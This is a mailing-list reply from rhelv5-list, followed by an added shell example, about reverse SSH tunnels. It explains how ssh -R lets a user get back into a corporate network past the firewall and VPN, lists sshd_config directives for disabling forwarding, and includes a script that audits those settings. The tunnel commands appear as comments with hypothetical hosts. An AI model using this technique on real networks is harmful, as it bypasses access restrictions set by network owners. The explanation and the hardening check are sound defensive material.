Re: [rhelv5-list] disable reverse ssh in sshd_config ?

Hugh Brown wrote:

FM wrote:
Yes the -R, ... And I am part of the network team LOL

Allowing inbound ssh w/ shell access means that your network perimeter/firewall is Swiss cheese.

Minor correction/clarification here... Allowing *outbound* ssh also means your network perimeter is equally Swiss cheese to someone who knows how to use ssh -R.

For example, if I can ssh out from a host inside your corporate network to an outside machine I control, using -R, I can then hop on that outside machine and ssh back into the corporate network over that reverse tunnel, completely bypassing all access restrictions, vpn requirements, etc.

I'm assuming that disallowing inbound ssh is not an option. If that's the case, then you can't do anything to guarantee that folks can't do things you don't want them to do. You can set the directives:

AllowTcpForwarding no
GatewayPorts no

However, the sshd_config man page has this to say about AllowTcpForwarding:

 "Note that disabling TCP forwarding does not improve security unless users
 are also denied shell access, as they can always install their own forwarders."

Indeed, ssh in the hands of a user who knows what they're doing... You can certainly make it more difficult, but generally speaking, you're not going to stop a determined user.

Jarod Wilson
jwilson redhat com
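The reverse tunnel described above and the two sshd_config directives, as an added example that is not part of the original thread. The hostnames, user names and the two sshd_config fragments are constructed for illustration; the check applies the sshd_config(5) defaults (AllowTcpForwarding yes, GatewayPorts no), takes the first global occurrence of a directive as sshd does, and skips Match blocks because their directives are conditional.

```shell
#!/bin/sh
# Added example (not from the original thread): the reverse tunnel from the
# thread, and a check of the two sshd_config directives on constructed configs.
set -e

# The tunnel described in the thread (hostnames/users are hypothetical; nothing
# here connects anywhere):
#   inside$  ssh -N -R 2222:localhost:22 me@outside.example.net
#   outside$ ssh -p 2222 me@localhost      # lands on the inside host's sshd
# The outside sshd opens the 2222 listener; its GatewayPorts setting decides
# whether that listener binds to loopback only (default) or to all interfaces.

# effective_value CONFIG_TEXT KEYWORD
# Prints KEYWORD's value from the global section of an sshd_config: keywords
# are case-insensitive, comments are ignored, "Key=value" is accepted, the
# first occurrence wins (as in sshd), and Match blocks are skipped because
# their directives are conditional. Prints nothing when the keyword is unset.
effective_value() {
  printf '%s\n' "$1" | awk -v want="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
    { sub(/#.*/, ""); gsub(/=/, " ") }
    NF == 0 { next }
    tolower($1) == "match" { in_match = 1 }
    in_match { next }
    tolower($1) == want && !done { print tolower($2); done = 1 }
  '
}

# Defaults per sshd_config(5): AllowTcpForwarding yes, GatewayPorts no.
allow_tcp_forwarding() { v=$(effective_value "$1" AllowTcpForwarding); echo "${v:-yes}"; }
gateway_ports()        { v=$(effective_value "$1" GatewayPorts);       echo "${v:-no}"; }

# forwarding_disabled CONFIG_TEXT: exit 0 only when both directives are "no".
# Newer OpenSSH also accepts "local"/"remote" for AllowTcpForwarding; only
# "no" counts as disabled here.
forwarding_disabled() {
  [ "$(allow_tcp_forwarding "$1")" = no ] && [ "$(gateway_ports "$1")" = no ]
}

# report LABEL CONFIG_TEXT
report() {
  printf '%-9s AllowTcpForwarding=%-4s GatewayPorts=%-4s ' \
    "$1:" "$(allow_tcp_forwarding "$2")" "$(gateway_ports "$2")"
  if forwarding_disabled "$2"; then
    echo "forwarding disabled (users with a shell can still run their own forwarder)"
  else
    echo "forwarding allowed"
  fi
}

# Constructed sample configs (not from any real host).
WEAK_CONFIG='# stock-looking config: forwarding left at defaults
Port 22
Protocol 2
#AllowTcpForwarding yes
X11Forwarding yes
'
HARDENED_CONFIG='# forwarding turned off globally; a Match block re-enables it
# for one account, which does not change the global answer
Port 22
Protocol 2
AllowTcpForwarding no
GatewayPorts=no
X11Forwarding no
Match User backup
    AllowTcpForwarding yes
'

report weak "$WEAK_CONFIG"
report hardened "$HARDENED_CONFIG"

# On a live host (OpenSSH 5.1+), audit the effective values rather than the file:
#   sshd -T | grep -iE '^(allowtcpforwarding|gatewayports) '
```

Which sshd enforces what: a `-R` listener is opened by the sshd the client connects to, so the two directives constrain what inbound sessions to the sshd carrying them may forward; in the scenario above they live on the outside machine's sshd, not on the internal one, and GatewayPorts there decides whether the reverse listener is reachable from anywhere beyond loopback. The check treats only an explicit "no" as disabled, and, as the man page says, a user with a shell can still run a forwarder of their own.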

